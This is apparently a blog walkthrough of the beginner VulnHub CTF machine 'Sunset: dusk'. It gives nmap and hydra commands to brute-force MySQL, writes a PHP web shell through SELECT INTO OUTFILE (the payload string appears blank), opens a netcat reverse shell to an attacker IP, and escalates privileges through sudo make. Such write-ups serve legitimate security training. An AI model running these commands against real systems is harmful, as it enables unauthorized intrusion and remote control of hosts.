Sunset: dusk is another CTF
challenge given by vulnhub and the level difficultly is set according to
beginners and credit goes to whitecr0wz. You have to hunt two flags, and this
is a boot to root challenge. Download it from here.
Penetration Testing Methologies
Network scaning
·
Nmap
·
Netdiscover
Enumeration
·
Weak credentials
·
PHP file
injection
Exploiting RCE
Privilege Escalation
·
Sudo rights
·
Docker
Walkthrough
Network Scanning
First of all, we try to
identify our target. We did this using the netdiscover command.
Now that we have identified our target using the above
command, we can continue to our next step i.e. scanning the host IP to identify
open ports and running services. We will use Nmap to scan the target with the
following command:
nmap -A 192.168.1.167
As result we found multiple open ports and services are
running across them thus, we need to enumerate further to step ahead.
Enumeration
We’ve start the enumeration with FTP and HTTP and tried to
find some suspicious information but unfortunately fail to get any remarkable
clue thus we tried for mysql brute force attack with the help of hydra using
rockyou.txt file.
hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.1.167 mysql
And we found the login creds for mysql where username is root
and password is password which also considered as weak credential.
We also navigate to port 8080 and it looks like, that page
is displaying the list of the current directory, here author has left the hint
for writable directory /var/tmp. Thus,
it become easy for us deface the machine using these loopholes.
Since we have mysql cred and we also know the working
directory is /var/tmp and with the help of this we can inject malicious PHP
code as SQL query into a file named “raj.php”. This will generate an RCE and as
result we will be able to spawn host machine by exploiting it.
select “” into outfile
‘/var/tmp/raj.php’ ;
So, again we navigate to port 8080 and saw the entry for
raj.php file.
It was time to execute raj.php and verify the RCE
parameter by executing following URL:
http://192.168.1.167:8080/raj.php?cmd=id
Thus, we find that we are able to run system command
through this page.
Exploiting
It was time to exploit RCE, thus we used the netcat reverse
shell to spawning shell o host machine.
http://192.168.1.167:8080/raj.php?cmd=nc -e /bin/bash
192.168.1.107 1234
Bravo!! We hit the goal and spawn the shell of host the
machine and found the 1st flag user.txt in the /home/dusk.
Privilege Escalation
Further we move towards privilege escalation and identify
the sudo rights for www-data and notice that user:www-data holds sudo rights
for “make” & “sl” program but here we try to escalate to shell for
user:dusk by exploiting make program.
COMMAND='/bin/sh'
sudo -u make -s --eval=$'x:\n\t-'"$COMMAND”
After executing above command, we were able to access the
host shell as user dusk who is also the member of the docker group.
0 comments:
Post a Comment